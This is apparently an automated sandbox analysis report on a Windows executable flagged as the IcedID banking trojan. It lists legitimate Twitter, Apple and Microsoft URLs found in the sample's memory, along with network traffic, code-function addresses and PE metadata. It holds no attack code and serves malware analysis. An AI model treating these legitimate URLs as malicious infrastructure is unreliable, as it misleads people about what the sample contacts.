Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/glossary
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/how-you-can-control-your-privacy
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account#account-settings
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account#deactivate-and-reactivate-accounts
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account#login-and-password
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account#notifications
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account#suspended-accounts
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account#username-email-and-phone
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account#verified-accounts
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account/forgotten-or-lost-password-reset
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account/how-to-add-a-phone-number-to-your-account
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/managing-your-account/notifications-on-mobile-devices
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/new-user-faq
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/rules
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/rules-and-policies
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/rules-and-policies#general-policies
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/rules-and-policies#law-enforcement-guildelines
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/rules-and-policies#research-and-experiments
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/rules-and-policies#twitter-rules
Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/rules-and-policies/twitter-cookies
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/rules-and-policies/twitter-rules
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/safety-and-security
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/safety-and-security#abuse
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/safety-and-security#ads-and-data-privacy
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/safety-and-security#hacked-account
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/safety-and-security#sensitive-content
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/safety-and-security#spam-and-fake-accounts
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/safety-and-security/account-security-tips
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/safety-and-security/control-your-twitter-experience
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/safety-and-security/how-to-make-twitter-private-and-public
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/twitter-guide
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#adding-content-to-your-tweet
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#blocking-and-muting
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#direct-messages
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#fleets
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#following-people-and-groups
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#search-and-trends
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#tweets
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#twitter-on-your-device
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#twitter-voices
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#using-periscope
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter#website-and-app-integrations
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter/advanced-twitter-mute-options
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter/direct-messages
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter/mentions-and-replies
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter/tweeting-gifs-and-pictures
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/en/using-twitter/twitter-videos
Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/es
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/fa
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/fi
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/fil
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/fr
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/gu
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/he
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/hi
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/hr
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/hu
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/id
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/it
Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/ja
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/kn
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/ko
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/mr
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/ms
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/nl
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/no
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/pl
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/pt
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/ro
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/ru
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/rules-and-policies/twitter-cookies
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/sk
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/sr
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/sv
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/ta
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/th
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/tr
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/uk
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/vi
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/zh-cn
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://help.twitter.com/zh-tw
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sOli
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://investor.twitterinc.com/
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://km.support.apple.com/etc/designs/support/publish/commons.min.js
Source: sample4.exe, 00000000.00000002.577897876.0000000003C04000.00000004.00000001.sdmp	String found in binary or memory: https://locate.apple.com/
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/logout.srf?ct=1610593513
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_mode=form_post
Source: sample4.exe, 00000000.00000003.530694107.0000000001521000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_mode=form_post&response_type=
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://marketing.twitter.com/
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://marketing.twitter.com/en/insights
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://marketing.twitter.com/en/success-stories
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://media.twitter.com/
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://office.com/start
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/about/en-us/
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://osiprodweuodcspstoa01.blob.core.windows.net
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.live.com/owa/
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://pbs.twimg.com/tweet_video_thumb/EAa_YvRU4AAH-IN.jpg:large
Source: sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://platform.twitter.com/widgets.js
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://privacy.twitter.com/
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://products.office.com/en-us/academic/compare-office-365-education-plans
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://resources.digital-cloud-prem.medallia.com
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://s1259914507.t.eloqua.com
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://schema.org
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://static.ads-twitter.com
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://status.twitterstat.us/
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://support.apple.com/
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://support.apple.com/#organization
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://support.apple.com/ar-jo
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://support.apple.com/de-de
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://support.apple.com/en-ae
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://support.apple.com/en-eg
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://support.apple.com/en-me
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://support.apple.com/fr-ci
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://support.apple.com/fr-gq
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://support.apple.com/pt-pt
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://support.apple.com/ro-ro
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://support.twitter.com/forms/get_help_now
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://support.xbox.com
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://support.xbox.com/
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://syndication.twitter.com
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://templates.office.com/
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://templates.office.com/collection-family-activities
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://transparency.twitter.com/
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532297635.000000000153E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/AppleSupport
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/applesupport
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/i/csp_report;
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/i/jot
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/intent/follow?user_id=17874544&screen_name=TwitterSupport
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/login?redirect_after_login=https://help.twitter.com/en
Source: sample4.exe, 00000000.00000003.532275265.0000000001546000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/logout
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/privacy
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/signup
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/tos
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://twittercommunity.com/
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://udc-neb.kampyle.com/
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://video.twimg.com/tweet_video/EAa_YvRU4AAH-IN.mp4
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp, sample4.exe, 00000000.00000003.545246856.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/#organization
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://www.apple.com/certificateauthority/public/.0
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://www.apple.com/certificateauthority/public/0
Source: sample4.exe, 00000000.00000003.545246856.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/ipad/
Source: sample4.exe, 00000000.00000003.545246856.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/iphone/
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/legal/internet-services/terms/site.html
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/legal/privacy/en-ww/
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/legal/sla/
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/legal/warranty/
Source: sample4.exe, 00000000.00000003.545246856.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/mac/
Source: sample4.exe, 00000000.00000002.577897876.0000000003C04000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/retail/
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/shop/goto/help/sales_refunds
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/sitemap/
Source: sample4.exe, 00000000.00000003.545246856.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/watch/
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: sample4.exe, 00000000.00000002.571424738.0000000001539000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/rpa-ua0
Source: sample4.exe, 00000000.00000003.533332045.0000000001539000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/DisplayAddEditPaymentPage/
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/DisplayEditProfilePage/tab.profile
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayAccountO
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayAccountR
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/DisplayFindYourOrderPage/nextAction.DisplayDownload
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoftstore.com/store/msusa/en_US/wishlists?Wt.mc_id=wishlist_landingpage
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://www.onenote.com/
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://www.skype.com/en/
Source: sample4.exe, 00000000.00000003.532203579.0000000003C01000.00000004.00000001.sdmp	String found in binary or memory: https://www.twitterflightschool.com/sl/382652bc
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.wikidata.org/wiki/Q65129345
Source: sample4.exe, 00000000.00000003.519277199.000000000152B000.00000004.00000001.sdmp	String found in binary or memory: https://www.xbox.com/
Source: sample4.exe, 00000000.00000003.545079805.0000000003C0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/applesupport

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443

Source: unknown

HTTPS traffic detected: 104.244.42.131:443 -> 192.168.2.3:49761 version: TLS 1.2

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_0012D175 GetPropW,GlobalFix,SendMessageW,GlobalUnWire,RemovePropW,GlobalFree,GlobalUnWire,GetAsyncKeyState,SendMessageW,

0_2_0012D175

E-Banking Fraud:

Yara detected IcedID

Show sources

Source: Yara match

File source: Process Memory Space: sample4.exe PID: 2100, type: MEMORY

Yara detected IcedID

Show sources

Source: Yara match	File source: 00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.sample4.exe.d0000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\sample4.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_0026404F	0_2_0026404F
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_0026416F	0_2_0026416F
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_0024C56C	0_2_0024C56C
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_0017A7C0	0_2_0017A7C0
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_00264847	0_2_00264847
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_0025098E	0_2_0025098E
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_00152C34	0_2_00152C34
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_00256C80	0_2_00256C80
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_00290890	0_2_00290890
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_00290683	0_2_00290683

Source: C:\Users\user\Desktop\sample4.exe	Code function: String function: 0024972F appears 62 times
Source: C:\Users\user\Desktop\sample4.exe	Code function: String function: 00249810 appears 35 times

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 768

Source: sample4.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: sample4.exe, 00000000.00000002.568529716.0000000001370000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs sample4.exe
Source: sample4.exe, 00000000.00000002.567097557.00000000002C4000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamearra.exe` vs sample4.exe
Source: sample4.exe	Binary or memory string: OriginalFilenamearra.exe` vs sample4.exe

Source: sample4.exe

